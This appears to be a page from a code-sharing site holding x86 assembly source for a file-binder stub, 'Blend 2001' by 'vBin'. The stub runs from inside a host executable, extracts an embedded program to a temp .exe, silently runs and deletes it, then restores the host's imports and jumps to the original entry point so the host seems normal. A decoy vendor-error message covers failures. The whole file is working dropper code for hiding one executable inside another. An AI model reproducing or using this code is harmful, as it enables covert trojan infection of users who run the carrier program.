📄 ee.asm
字号:
mov eax,[Save_size+ebp]
mov [IndexOffsetSize+ebp],eax ;要脱出文件的大小
mov eax,[Save_add+ebp]
mov [IndexOffsetaddr+ebp],eax ;地址
;-----------------------------------------输入文件===
push edx
push ecx
push edi
push esi
;-------------------------取得临时文件名
lea eax,[tmppath+ebp]
push eax
mov eax,size tmppath
push eax
call [vGetTempPathA+ebp]
lea eax,[fullname+ebp]
push eax
push 0
lea eax,[headtemp+ebp]
push eax
lea eax,[tmppath+ebp]
push eax
call [vGetTempFileNameA+ebp]
lea eax,[fullname+ebp]
push eax
call [vlstrlen+ebp]
mov ecx,eax
dec ecx
mov byte ptr [fullname+ecx+ebp],65h ;78h 65h
dec ecx
mov byte ptr [fullname+ecx+ebp],78h ;
dec ecx
mov byte ptr [fullname+ecx+ebp],65h ;
lea eax,[fullname+ebp]
mov [vDFilepath+ebp],eax
lea eax,[tmpcopyname+ebp]
push eax
push 0
lea eax,[headtemp+ebp]
push eax
lea eax,[tmppath+ebp]
push eax
call [vGetTempFileNameA+ebp]
push 100
lea eax,[vNowFileNames+ebp]
push eax
push 0
call [vGetModuleFileNameA+ebp]
push 0
lea eax,[tmpcopyname+ebp]
push eax
lea eax,[vNowFileNames+ebp]
push eax
call [vCopyFileA+ebp]
lea eax,[tmpcopyname+ebp]
mov [vSFilepath+ebp],eax
;--------------------------------------------
push 0
push 20h
push 3h
push 0
push 0
push 0c0000000h
mov eax,[vSFilepath+ebp]
push eax
call [vCreateFileA+ebp] ;,[SFilepath],0c0000000h,0,0,3h,20h,0
mov [vFile_s+ebp],eax
push 0
push 0
push 0
push 4h
push 0
mov eax,[vFile_s+ebp]
push eax
call [vCreateFileMappingA+ebp] ;,[vFile_s],0,4h,0,0,0
mov [vFMap_s+ebp],eax
push 0
push 20h
push 4h
push 0
push 3h
push 0c0000000h
mov eax,[vDFilepath+ebp]
push eax
call [vCreateFileA+ebp] ;,[DFilepath],0c0000000h,3h,0,4h,20h,0
mov [vFile_d+ebp],eax
push 0
push 0
push 0
push 2h
mov eax,[vFMap_s+ebp]
push eax
call [vMapViewOfFile+ebp] ;,[vFMap_s],2h,0,0,0
mov [vMemory+ebp],eax
lea edx,[vReadBy+ebp]
mov eax,[IndexOffsetaddr+ebp]
add [vMemory+ebp],eax
push 0
push edx
mov eax,[IndexOffsetSize+ebp]
push eax
mov eax,[vMemory+ebp]
push eax
mov eax,[vFile_d+ebp]
push eax
call [vWriteFile+ebp] ;,[vFile_d],[vMemory],[IndexOffsetSize],edx,0
mov eax,[vMemory+ebp]
push eax
call [vUnmapViewOfFile+ebp] ;,[vMemory]
mov eax,[vFMap_s+ebp]
push eax
call [vCloseHandle+ebp] ;,[vFMap_s]
mov [vFMap_s+ebp],0
mov eax,[vFile_s+ebp]
push eax
call [vCloseHandle+ebp] ;,[vFile_s]
mov eax,[vFile_d+ebp]
push eax
call [vCloseHandle+ebp] ;,[vFile_d]
push 1h
lea eax,[fullname+ebp]
push eax
call [vWinExec+ebp] ;运行脱后的文件
;--------------- 删除该删的文件
lea eax,[tmpcopyname+ebp]
push eax
call [vDeleteFileA+ebp]
lea eax,[fullname+ebp]
push eax
call [vDeleteFileA+ebp]
pop esi
pop edi
pop ecx
pop edx
;-----------------------------------------
;------------------原引入表装入----
mov edx,[BASE_RVA+ebp] ;通过预先保存的基址和IMPORT地址
mov esi,[MI_RVA+ebp] ;得到当前IMPORT地址
add esi,edx
Next_DLL:
mov eax,[esi+0ch] ;读取DLL文件模块
or eax,eax
jz Dll_END
add eax,edx
mov ebx,eax
push eax
call [vGetModuleHandleA+ebp]
or eax,eax
jnz Dll_LOADED
push ebx
call [vLoadLibraryA+ebp]
or eax,eax
jnz Dll_LOADED
Exit_LOADER:
lea eax,[MI_ERR_TITLE+ebp]
push 64
push eax
lea eax,[MI_ERR_TEXTS+ebp]
push eax
push 0
call [vMessageBoxA+ebp]
push 0
call [vExitProcess+ebp]
Dll_LOADED:
mov [hDll+ebp],eax ;保存模块句柄
mov [FunTable_Count+ebp],0 ;函数表的索引 两个地址之间相隔一个双字
Next_FUNCTION:
mov edx,[BASE_RVA+ebp]
mov eax,[esi]
or eax,eax
jnz Hint_OK
mov eax,[esi+10h]
Hint_OK:
add eax,edx
add eax,[FunTable_Count+ebp]
mov ebx,[eax]
;;;;;;
mov edi,[esi+10h]
add edi,edx
add edi,[FunTable_Count+ebp]
;;;;;;
test ebx,ebx
jz Function_END
test ebx,80000000h
jnz Function_ORDINAL
add ebx,edx
add ebx,2
jmp Function_GOON
Function_ORDINAL:
and ebx,0FFFFFFFh
Function_GOON:
push ebx
push dword ptr [hDll+ebp]
call [vGetProcAddress+ebp]
or eax,eax
jz Exit_LOADER
mov [edi],eax
add [FunTable_Count+ebp],4
jmp Next_FUNCTION
Function_END:
add esi,14h
mov edx,[BASE_RVA+ebp]
jmp Next_DLL
Dll_END:
;----------------------------------
mov eax,[Src_addr+ebp]
jmp eax
align 4
;----我的引入表--------------
v_ImportA dd Ker_API-v_ImportA ;IMAGE_THUNK_DATA 数组指针
v_TimeDateA dd 0 ;文件建立时间
v_ForChainA dd 0 ;0
v_DllNameA dd KerName-v_ImportA ;DLL名称
v_FThunkA dd vGetProcAddress-v_ImportA ;IMAGE_THUNK_DATA 数组指针
v_ImportB dd Use_API-v_ImportA ;IMAGE_THUNK_DATA 数组指针
v_TimeDateB dd 0 ;文件建立时间
v_ForChainB dd 0 ;0
v_DllNameB dd UserName-v_ImportA ;DLL名称
v_FThunkB dd vMessageBoxA-v_ImportA ;IMAGE_THUNK_DATA 数组指针
dd 20 dup (0) ;引入表结束符
KerName db 'KERNEL32.DLL',0
Ker_API dd KAPI_A-v_ImportA
dd KAPI_B-v_ImportA
dd KAPI_C-v_ImportA
dd KAPI_D-v_ImportA
dd KAPI_E-v_ImportA
dd KAPI_F-v_ImportA
dd KAPI_G-v_ImportA
dd KAPI_H-v_ImportA
dd KAPI_I-v_ImportA
dd KAPI_J-v_ImportA
dd KAPI_K-v_ImportA
dd KAPI_L-v_ImportA
dd KAPI_M-v_ImportA
dd KAPI_N-v_ImportA
dd KAPI_O-v_ImportA
dd KAPI_P-v_ImportA
dd KAPI_Q-v_ImportA
dd 0
UserName db 'USER32.DLL',0
Use_API dd UAPI_A-v_ImportA
dd 0
vGetProcAddress dd 0
vGetModuleHandleA dd 0
vLoadLibraryA dd 0
vExitProcess dd 0
vCreateFileA dd 0
vCreateFileMappingA dd 0
vGetTempPathA dd 0
vGetTempFileNameA dd 0
vlstrlen dd 0
vMapViewOfFile dd 0
vWriteFile dd 0
vUnmapViewOfFile dd 0
vCloseHandle dd 0
vCopyFileA dd 0
vGetModuleFileNameA dd 0
vDeleteFileA dd 0
vWinExec dd 0
vMessageBoxA dd 0
dd 0
KAPI_A db 0,0,'GetProcAddress',0
KAPI_B db 0,0,'GetModuleHandleA',0
KAPI_C db 0,0,'LoadLibraryA',0
KAPI_D db 0,0,'ExitProcess',0
KAPI_E db 0,0,'CreateFileA',0
KAPI_F db 0,0,'CreateFileMappingA',0
KAPI_G db 0,0,'GetTempPathA',0
KAPI_H db 0,0,'GetTempFileNameA',0
KAPI_I db 0,0,'lstrlen',0
KAPI_J db 0,0,'MapViewOfFile',0
KAPI_K db 0,0,'WriteFile',0
KAPI_L db 0,0,'UnmapViewOfFile',0
KAPI_M db 0,0,'CloseHandle',0
KAPI_N db 0,0,'CopyFileA',0
KAPI_O db 0,0,'GetModuleFileNameA',0
KAPI_P db 0,0,'DeleteFileA',0
KAPI_Q db 0,0,'WinExec',0
UAPI_A db 0,0,'MessageBoxA',0
;----------------------------
align 4
vImport_End:
;----------------------------
MI_RVA dd 0
BASE_RVA dd 0
hDll dd 0
FunTable_Count dd 0 ;函数表中的索引
MI_ERR_TITLE db "系统错误!",0
MI_ERR_TEXTS db "资源无法装入,请与软件供应商联系!",0
;----------------------------
Src_addr dd 0
;----------------------------
Save_add dd 0 ;数据开始存储的地址
Save_size dd 0
;----------------------------
TestMsg db '这是后面的,成功啦!',0
;--------------------------------输入文件专用
tmppath db 250 dup(0)
fullname db 250 dup(0)
headtemp db "tmp",0
vSFilepath dd 0
vDFilepath dd 0
IndexOffsetaddr dd 0
IndexOffsetSize dd 0
vFile_s dd 0
vFMap_s dd 0
vFile_d dd 0
vMemory dd 0
vReadBy dd 0
tmpcopyname db 250 dup(0)
vNowFileNames db 100 dup(0)
;---------------------------------------------
about_a db "MakeFrom:Blend 2001",0
about_b db "Author:vBin",0
about_c db "VER:1.0 Beta 1",0
;---------------------------------------------
vend:
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -